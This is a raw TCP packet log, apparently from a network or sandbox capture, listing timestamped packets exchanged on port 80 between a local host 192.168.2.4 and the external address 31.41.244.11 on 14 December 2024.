Dec 14, 2024 23:58:12.555674076 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.555691004 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.555737019 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.555783987 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.556267977 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.556406975 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.556463003 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.557338953 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.557456017 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.557504892 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.558383942 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.558505058 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.558558941 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.559426069 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.559473991 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.559539080 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.559595108 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.560467005 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.560525894 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.560587883 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.560750961 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.561537027 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.561589956 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.561655998 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.561702013 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.562642097 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.562699080 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.562712908 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.562763929 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.563633919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.563683987 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.563776016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.564127922 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.564687014 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.564749002 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.701627970 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.701759100 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.701844931 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.702091932 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.702146053 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.702224016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.702280045 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.703154087 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.703206062 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.703320026 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.703367949 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.704220057 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.704269886 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.704355955 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.704411030 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.705282927 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.705333948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.705413103 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.706341028 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.706392050 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.706456900 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.706505060 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.707360983 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.707421064 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.707489967 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.707542896 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.708429098 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.708482981 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.708554029 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.708599091 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.709510088 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.709624052 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.709676027 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.710553885 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.710604906 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.710649967 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.710697889 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.711615086 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.711664915 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.711746931 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.711795092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.712657928 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.712707996 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.712757111 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.712805033 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.713715076 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.714034081 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.714085102 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.714760065 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.714808941 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.714873075 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.714920044 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.715859890 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.715919018 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.715954065 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.716001034 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.716861963 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.716911077 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.716984987 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.717031956 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.717917919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.718039036 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.718087912 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.718971968 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.719073057 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.719114065 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.719199896 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.720029116 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.720118999 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.720314980 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.721101999 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.721168995 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.721218109 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.721262932 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.722136021 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.722203016 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.722249031 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.722557068 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.723206043 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.723325014 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.723459959 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.724253893 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.724328995 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.724356890 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.724405050 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.725297928 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.725356102 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.725441933 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.726362944 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.726413012 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.726491928 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.726536036 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.727417946 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.727469921 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.727539062 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.727582932 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.728458881 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.728507042 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.728599072 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.728642941 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.729531050 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.729644060 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.729720116 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.730562925 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.730613947 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.730796099 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.730846882 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.731612921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.731672049 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.731781960 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.731831074 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.732664108 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.732713938 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.732839108 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.732897043 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.733726978 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.733874083 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.733922958 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.734777927 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.734828949 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.734925032 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.734975100 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.735836983 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.735897064 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.735972881 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.736021996 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.736913919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.736969948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.737029076 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.737076998 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.737971067 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.738028049 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.738109112 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.738159895 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.738998890 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.739048004 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.739114046 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.739165068 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.740067959 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.740128994 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.740202904 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.740252972 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.741137028 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.741195917 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.741267920 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.741316080 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.742209911 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.742446899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.742506027 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.743231058 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.743289948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.743341923 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.743406057 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.744282961 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.744334936 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.744412899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.744465113 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.745361090 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.745414019 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.745476007 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.746388912 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.746444941 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.746515989 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.746566057 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.747441053 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.747518063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.747587919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.747636080 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.748501062 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.748553991 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.748624086 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.748667002 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.749562979 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.749692917 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.749743938 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.750608921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.750658035 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.750721931 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.750768900 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.751663923 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.751715899 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.751776934 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.751826048 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.752728939 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.752778053 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.752851009 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.752896070 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.753774881 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.753938913 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.754003048 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.754829884 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.754883051 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.755026102 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.755075932 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.755867004 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.755919933 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.756009102 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.756057024 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.756875992 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.756936073 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.893925905 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.894289970 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.894428015 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.894556046 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.894604921 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.894604921 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.894653082 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.895467043 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.895536900 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.895574093 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.895802021 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.896514893 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.896572113 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.896636963 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.896687984 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.897553921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.897701025 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.897758007 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.898617029 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.898667097 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.898746014 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.898797035 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.899679899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.899732113 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.899802923 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.899853945 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.900717020 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.900769949 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.900870085 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.900918961 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.901783943 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.901902914 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.901957989 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.902833939 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.902888060 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.902951002 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.903006077 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.903872013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.903924942 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.904014111 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.904067039 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.905004025 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.905054092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.905102015 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.905149937 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.906022072 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.906121969 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.906178951 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.907063961 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.907118082 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.907238960 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.907293081 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.908132076 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.908181906 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.908262968 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.908309937 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.909145117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.909195900 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.909282923 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.909332037 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.910274029 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.910356045 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.910412073 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.911248922 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.911303997 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.911387920 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.911437035 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.912321091 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.912373066 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.912448883 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.912499905 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.913363934 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.913513899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.913567066 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.914423943 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.914474010 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.914570093 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.914618015 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.915478945 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.915530920 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.915605068 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.915656090 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.916547060 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.916606903 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.916652918 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.916702986 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.917608023 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.917777061 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.917826891 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.918663025 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.918714046 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.918776035 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.918824911 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.919743061 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.919792891 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.919847012 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.919898987 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.920757055 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.920811892 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.920892000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.920938969 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.921819925 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.921952963 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.922003984 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.922883034 CET	80	49770	31.41.244.11	192.168.2.4
